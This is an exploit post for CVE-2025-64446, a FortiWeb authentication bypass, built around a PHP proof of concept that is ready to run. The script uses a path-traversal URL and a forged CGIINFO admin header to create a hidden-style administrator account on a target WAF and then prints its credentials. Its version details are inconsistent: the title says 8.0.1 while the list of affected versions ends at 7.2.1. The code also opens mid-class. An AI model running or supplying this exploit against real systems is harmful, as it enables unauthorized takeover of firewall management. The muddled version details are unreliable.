============================================================================================================================================= | # Title : FortiWeb 8.0.1 Authentication Bypass to Unauthorized User Creation | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://www.fortinet.com/ | ============================================================================================================================================= POC : [+] References : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-64446 https://packetstorm.news/files/id/211729/ https://fortiguard.fortinet.com/psirt/FG-IR-25-071 [+] Summary A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API endpoint. This vulnerability enables complete compromise of the FortiWeb management interface. [+] Vulnerability Type: Authentication Bypass via Path Traversal → Unauthorized User Creation • Affected Versions: FortiWeb 7.2.1 and earlier, 7.0.6 and earlier, 6.4.2 and earlier, 6.3.7 and earlier • Patched Version: 7.2.2, 7.0.7, 6.4.3, 6.3.8 • Attack Vector: Network • Authentication: Not Required (Unauthenticated) • CVSS Score: 9.8 (Critical) • CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') & CWE-862: Missing Authorization • CVE: CVE-2025-64446 [+] Technical Description The vulnerability exists in the FortiWeb API endpoint handling where improper path validation allows attackers to bypass authentication mechanisms. The flaw enables: 1. Path traversal to access privileged CGI endpoints 2. Bypass of API authentication checks 3. Unauthorized creation of administrative users 4. Complete compromise of FortiWeb management [+] Usage: Usage: php poc.php fortigate.example.com:8443 [+] POC : colors = [ 'RED' => "\033[91m", 'GREEN' => "\033[92m", 'YELLOW' => "\033[93m", 'BLUE' => "\033[94m", 'MAGENTA' => "\033[95m", 'CYAN' => "\033[96m", 'WHITE' => "\033[97m", 'BOLD' => "\033[1m", 'RESET' => "\033[0m" ]; } private function color($text, $color) { return $this->colors[$color] . $text . $this->colors['RESET']; } private function showBanner() { $banner = $this->color(" indoushka (*) FortiWeb Authentication Bypass Artifact Generator ", 'MAGENTA') . $this->color(" CVEs: [CVE-2025-64446]\n", 'RED'); echo $banner . "\n"; } private function generateUUID() { return sprintf('%04x%04x', mt_rand(0, 0xffff), mt_rand(0, 0xffff)); } public function execute($target) { $this->showBanner(); // Parse target host and port $parts = explode(':', $target); if (count($parts) !== 2) { echo $this->color("[-] Invalid format! Use ", 'RED') . "\n"; exit(1); } $host = $parts[0]; $port = (int)$parts[1]; $user = $this->generateUUID(); $password = $user; $rawPath = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi"; $cgiinfoJson = [ "username" => "admin", "profname" => "prof_admin", "vdom" => "root", "loginname" => "admin" ]; $cgiinfoB64 = base64_encode(json_encode($cgiinfoJson)); $headers = [ "CGIINFO: " . $cgiinfoB64, "Content-Type: application/x-www-form-urlencoded", ]; $body = [ "data" => [ "q_type" => 1, "name" => $user, "access-profile" => "prof_admin", "access-profile_val" => "0", "trusthostv4" => "0.0.0.0/0", "trusthostv6" => "::/0", "last-name" => "", "first-name" => "", "email-address" => "", "phone-number" => "", "mobile-number" => "", "hidden" => 0, "comments" => "", "sz_dashboard" => -1, "type" => "local-user", "type_val" => "0", "admin-usergrp_val" => "0", "wildcard_val" => "0", "accprofile-override_val" => "0", "sshkey" => "", "passwd-set-time" => 0, "history-password-pos" => 0, "history-password0" => "", "history-password1" => "", "history-password2" => "", "history-password3" => "", "history-password4" => "", "history-password5" => "", "history-password6" => "", "history-password7" => "", "history-password8" => "", "history-password9" => "", "force-password-change" => "disable", "force-password-change_val" => "0", "password" => $password ] ]; $bodyData = json_encode($body); echo $this->color("[~] Sending exploit payload to $host:$port ...", 'BLUE') . "\n"; // Create SSL context to disable verification $context = stream_context_create([ 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false, 'allow_self_signed' => true ], 'http' => [ 'method' => 'POST', 'header' => implode("\r\n", $headers) . "\r\n", 'content' => $bodyData, 'ignore_errors' => true ] ]); $url = "https://$host:$port$rawPath"; // Send the request $response = @file_get_contents($url, false, $context); if ($response === false) { echo $this->color("[✗] Exploit failed - Could not connect to target", 'RED') . "\n"; exit(1); } // Get HTTP status code from response headers $statusCode = 0; if (isset($http_response_header[0])) { preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $matches); $statusCode = isset($matches[1]) ? (int)$matches[1] : 0; } // Process result if ($statusCode === 200) { echo $this->color("[✓] Exploit sent successfully!", 'GREEN') . "\n"; echo $this->color("[*] New user created → ", 'YELLOW') . $this->color($user, 'GREEN') . "\n"; echo $this->color("[*] Password → ", 'YELLOW') . $this->color($password, 'GREEN') . "\n"; } else { echo $this->color("[✗] Exploit failed — Status Code: $statusCode", 'RED') . "\n"; // Debug information if (!empty($http_response_header)) { echo $this->color("[*] Response headers:", 'YELLOW') . "\n"; foreach ($http_response_header as $header) { echo " $header\n"; } } if (!empty($response)) { echo $this->color("[*] Response body:", 'YELLOW') . "\n"; echo substr($response, 0, 500) . "\n"; } } } } // Main execution if (php_sapi_name() === 'cli') { if ($argc !== 2) { echo "Usage: php cve-2025-64446.php \n"; echo "Example: php cve-2025-64446.php 192.168.1.1:443\n"; exit(1); } $exploit = new FortiWebExploit(); $exploit->execute($argv[1]); } else { echo "This script is intended for command line use only.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================